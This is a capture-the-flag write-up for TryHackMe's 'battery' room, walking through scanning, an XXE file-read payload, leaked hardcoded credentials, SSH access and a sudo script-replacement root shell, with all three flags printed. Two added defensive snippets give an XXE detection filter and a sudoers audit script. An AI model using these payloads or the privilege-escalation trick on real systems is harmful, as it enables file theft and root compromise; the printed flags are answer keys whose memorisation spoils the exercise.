Tryhackme | battery

Nehru G
4 min read · May 23, 2021

Tryhackme — battery

Nmap (network mapper)

# nmap -sT -vv -sC -sV 10.10.21.189

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 14:6b:67:4c:1e:89:eb:cd:47:a2:40:6f:5f:5c:8c:c2 (DSA)
| 2048 66:42:f7:91:e4:7b:c6:7e:47:17:c6:27:a7:bc:6e:73 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkDLTds2sLmn9AZ0KAl70Fu5gfx5T6MDJehrsCzWR3nIVczHLHFVP+jXDzCcB075jjXbb+6IYFOdJiqgnv6SFxk85kttdvGs/dnmJ9/btJMgqJI0agbWvMYlXrOSN26Db3ziUGrddEjTT74Z1kokg8d7uzutsfZjxxCn0q75NDfDpNNMLlstOEfMX/HtOUaLQ47IeuSpaQoUkNkHF2SGoTTpbC+avzcCNHRIZEwQ6HdA3vz1OY6TnpAk8Gu6st9XoDGblGt7xv1vyt0qUdIYaKib8ZJQyj1vb+SJx6dCljix4yDX+hbtyKn08/tRfNeRhVSIIymOTxSGzBru2mUiO5
| 256 a8:6a:92:ca:12:af:85:42:e4:9c:2b:0e:b5:fb:a8:8b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCYHRWUDqeSQgon8sLFyvLMQygCx01yXZR6kxiT/DnZU+3x6QmTUir0HaiwM/n3aAV7eGigds0GPBEVpmnw6iu4=
| 256 62:e4:a3:f6:c6:19:ad:30:0a:30:a1:eb:4a:d3:12:d3 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILW7vyhbG1WLLhSEDM0dPxFisUrf7jXiYWNSTqw6Exri
80/tcp open http syn-ack Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Here, ports 22 (SSH) and 80 (HTTP) are open.

Enumeration

Then we run gobuster to enumerate directories and files on the web server:

# gobuster dir -u http://10.10.21.189 -w /usr/share/dirb/wordlists/common.txt -x txt,php

/acc.php (Status: 200) [Size: 1104]
/admin.php (Status: 200) [Size: 663]
/dashboard.php (Status: 302) [Size: 908] [ → admin.php]
/forms.php (Status: 200) [Size: 2334]
/index.html (Status: 200) [Size: 406]
/logout.php (Status: 302) [Size: 0] [ → admin.php]
/register.php (Status: 200) [Size: 715]
/report (Status: 200) [Size: 16912]
/scripts (Status: 301) [Size: 313] [ → http://10.10.21.189/scripts/]
/server-status (Status: 403) [Size: 292]
/with.php (Status: 302) [Size: 1259] [ → admin.php]

Let's check /register.php.

Let's try to log in.

Here is the dashboard view.

FILE

We can't access the My Account and Command menus, though. Let's check the /report file.

Run strings on it in the terminal:

# strings report

support@bank.a
contact@bank.a
cyber@bank.a
admins@bank.a
sam@bank.a
admin0@bank.a
super_user@bank.a
control_admin@bank.a
it_admin@bank.a
Welcome To ABC DEF Bank Managemet System!

Let's check the command page. It submits XML like this:

<?xml version="1.0" encoding="UTF-8"?>
<root>
<name>
aaa
</name>
<search>
test
</search>
</root>

Then we use an XXE payload, following the OWASP description at https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY test SYSTEM "file:///etc/passwd"> ]>
<root>
<name>
aaa
</name>
<search>
&test;
</search>
</root>

Here, I try to read the /acc.php source code.

<!ENTITY % payload SYSTEM "php://filter/convert.base64-encode/resource=file:///var/www/html/register.php" >

The php://filter wrapper returns the file base64-encoded, which is why the response looks like an encoded blob.

Let's decode the base64; the decoded source contains a password.

# echo "base64EncodedString" | base64 -d >> output.php

session_start();
if(isset($_SESSION['favcolor']) and $_SESSION['favcolor']==="admin@bank.a")
{
echo "<h3 style='text-align:center;'>Weclome to Account control panel</h3>";
echo "<form method='POST'>";
echo "<input type='text' placeholder='Account number' name='acno'>";
echo "<br><br><br>";
echo "<input type='text' placeholder='Message' name='msg'>";
echo "<input type='submit' value='Send' name='btn'>";
echo "</form>";
//MY CREDS :- cyber:super#secure&password!
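As an added example (not code from the write-up or the room), here is the kind of input check a defender would put in front of the command page's XML handler: it scans the raw request body for the DOCTYPE and external-entity markers seen in the payload above and refuses to parse anything that carries them. The two sample requests are constructed copies of the XML shown above; the function and pattern names are my own.

```python
"""Added example: reject XXE-shaped requests before any XML parser sees them."""
import re
import xml.etree.ElementTree as ET

# Constructed copies of the two requests shown in the write-up.
BENIGN_XML = """<?xml version="1.0" encoding="UTF-8"?>
<root><name>aaa</name><search>test</search></root>"""

XXE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY test SYSTEM "file:///etc/passwd"> ]>
<root><name>aaa</name><search>&test;</search></root>"""

# Each pattern maps to the reason a WAF rule or application log would record.
SIGNALS = [
    (re.compile(r"<!DOCTYPE", re.I), "DOCTYPE declaration"),
    (re.compile(r"<!ENTITY\s+%?\s*\w+\s+(SYSTEM|PUBLIC)", re.I), "external entity"),
    (re.compile(r"\b(file|php|expect|gopher)://", re.I), "sensitive URI scheme"),
]


def xxe_indicators(xml_text: str) -> list[str]:
    """Return the XXE indicators present in the raw request body, in SIGNALS order."""
    return [reason for pat, reason in SIGNALS if pat.search(xml_text)]


def parse_search_request(xml_text: str) -> dict[str, str]:
    """Parse a <root><name/><search/></root> request, refusing anything with a DOCTYPE.

    The gate runs on the raw text before the parser is invoked, so a declared
    entity is never resolved no matter which XML library sits behind the endpoint.
    """
    found = xxe_indicators(xml_text)
    if found:
        raise ValueError("rejected XML request: " + ", ".join(found))
    root = ET.fromstring(xml_text)
    if root.tag != "root":
        raise ValueError("unexpected root element %r" % root.tag)
    return {child.tag: (child.text or "").strip() for child in root}


def is_accepted(xml_text: str) -> bool:
    """True if the request would reach the application logic."""
    try:
        parse_search_request(xml_text)
        return True
    except (ValueError, ET.ParseError):
        return False


if __name__ == "__main__":
    print(parse_search_request(BENIGN_XML))
    print(xxe_indicators(XXE_XML))
```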

User flag1.txt

# ssh cyber@10.10.133.60

cyber@ubuntu:~$ id
uid=1000(cyber) gid=1000(cyber) groups=1000(cyber),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare)
cyber@ubuntu:~$ ls
flag1.txt run.py
cyber@ubuntu:~$ cat flag1.txt
THM{6f7e4dd134e19af144c88e4fe46c67ea}

Privilege escalation

Try sudo -l:

cyber@ubuntu:~$ sudo -l
Matching Defaults entries for cyber on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User cyber may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/python3 /home/cyber/run.py

We can run /usr/bin/python3 /home/cyber/run.py as root, and run.py sits in our own home directory, so we can replace it with a script of our choosing.

cyber@ubuntu:~$ mv run.py run2
cyber@ubuntu:~$ ls
flag1.txt run2
cyber@ubuntu:~$ echo 'import os; os.system("/bin/sh")' > run.py
cyber@ubuntu:~$ chmod +x run.py
cyber@ubuntu:~$ sudo /usr/bin/python3 /home/cyber/run.py
# whoami
root
# cd /root
# cat root.txt
THM{db12b4451d5e70e2a177880ecfe3428d}
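As an added example (not part of the write-up), a small POSIX shell audit for the sudoers pattern that gave us root: for each absolute path in a rule line as printed by sudo -l, it reports whether the named user owns the target, or whether the target or its directory is world-writable. The user name and rule line are parameters; nothing on the box is changed and sudo itself is not invoked.

```shell
#!/bin/sh
# Added example: audit a sudoers rule such as
#   (root) NOPASSWD: /usr/bin/python3 /home/cyber/run.py
# for targets the invoking user can rewrite. A script the user owns (or a
# directory the user can create files in) means the user decides what runs as root.

# user_can_modify USER PATH
# True if USER owns PATH or PATH is world-writable. Permission bits are checked
# with find rather than "test -w" so the verdict does not depend on whether the
# audit itself happens to run as root.
user_can_modify() {
    [ -n "$(find "$2" -prune \( -user "$1" -o -perm -002 \) -print 2>/dev/null)" ]
}

# check_rule USER "RULE LINE"
# Prints one finding per risky path; returns 0 when the rule looks safe, 1 otherwise.
check_rule() {
    user="$1"
    rule="$2"
    cmdline="${rule#*: }"          # drop the "(root) NOPASSWD:" prefix
    verdict=0
    for path in $cmdline; do
        case "$path" in
            /*) ;;                 # only absolute paths are inspected
            *) continue ;;
        esac
        if user_can_modify "$user" "$path"; then
            echo "RISK: $user can modify $path (runs as root via: $cmdline)"
            verdict=1
        elif user_can_modify "$user" "$(dirname "$path")"; then
            echo "RISK: $user can replace $path (its directory is writable)"
            verdict=1
        fi
    done
    [ "$verdict" -eq 0 ] && echo "OK: $cmdline"
    return "$verdict"
}
```

Run it as the account under review with the exact line from sudo -l; a RISK line on a script argument is the condition exploited above.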

Flag2.txt

# cd /home
# ls
cyber yash
# cd cybr
/bin/sh: 6: cd: can't cd to cybr
# ls
cyber yash
# cd yash
# ls
emergency.py fernet flag2.txt root.txt
# cat flag2.txt
THM{20c1d18791a246001f5df7867d4e6bf5}

Flags:

base flag - THM{6f7e4dd134e19af144c88e4fe46c67ea}

user flag - THM{20c1d18791a246001f5df7867d4e6bf5}

root flag - THM{db12b4451d5e70e2a177880ecfe3428d}
